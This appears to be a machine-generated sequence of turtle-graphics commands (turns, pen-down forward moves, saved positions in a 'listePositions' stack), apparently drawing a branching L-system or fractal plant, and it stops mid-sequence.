listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((190.10,324.70), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,324.70)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((190.10,324.70), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,324.70)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((196.23,339.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.23,339.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((196.23,339.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.23,339.48)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((207.54,350.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.54,350.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5), ((207.54,350.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.54,350.79)), setheading(45.0) ;
pu(), setposition((190.10,308.70)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((201.42,320.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((201.42,320.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((201.42,320.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((201.42,320.01)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((212.73,331.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((212.73,331.32)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((228.73,331.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,331.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((228.73,331.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,331.32)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((243.51,337.45), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.51,337.45)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((243.51,337.45), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.51,337.45)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((254.83,348.76), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.83,348.76)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 22.5), ((254.83,348.76), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.83,348.76)), setheading(45.0) ;
pu(), setposition((212.73,331.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((218.85,346.11), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.85,346.11)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((218.85,346.11), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.85,346.11)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((230.17,357.42), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.17,357.42)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((230.17,357.42), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.17,357.42)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((244.95,363.54), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.95,363.54)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((212.73,331.32), 45.0), ((244.95,363.54), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.95,363.54)), setheading(22.5) ;
pu(), setposition((212.73,331.32)), setheading(45.0) ;
pu(), setposition((177.86,247.13)), setheading(67.5) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((60.30,161.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,161.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,176.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,176.35)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 67.5), ((66.42,192.35), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,192.35)), setheading(90.0) ;
pu(), setposition((48.98,150.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,165.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,165.04)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((42.86,181.04), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,181.04)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,150.26), 90.0), ((48.98,195.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,195.82)), setheading(67.5) ;
pu(), setposition((48.98,150.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,166.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,166.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,166.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,166.26)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,182.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,182.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,208.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,208.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,208.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,208.35)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,224.35), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,224.35)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((66.42,224.35), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,224.35)), setheading(90.0) ;
pu(), setposition((48.98,182.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,213.04), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,213.04)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,213.04), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,213.04)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,227.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,227.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,227.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,227.82)), setheading(67.5) ;
pu(), setposition((48.98,182.26)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((60.30,193.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((60.30,193.57)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((71.61,204.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((71.61,204.88)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((87.61,204.88), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.61,204.88)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((87.61,204.88), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.61,204.88)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((102.39,211.01), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.39,211.01)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((102.39,211.01), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((102.39,211.01)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((113.71,222.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.71,222.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 22.5), ((113.71,222.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((113.71,222.32)), setheading(45.0) ;
pu(), setposition((71.61,204.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((77.73,219.67), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((77.73,219.67), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((89.05,230.98), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.05,230.98)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((89.05,230.98), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.05,230.98)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((103.83,237.10), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.83,237.10)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((71.61,204.88), 45.0), ((103.83,237.10), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.83,237.10)), setheading(22.5) ;
pu(), setposition((71.61,204.88)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((77.73,219.67), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((77.73,219.67), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,219.67)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,234.45)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,234.45)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((98.64,240.57), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((98.64,240.57)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((98.64,240.57), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((98.64,240.57)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((109.95,251.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
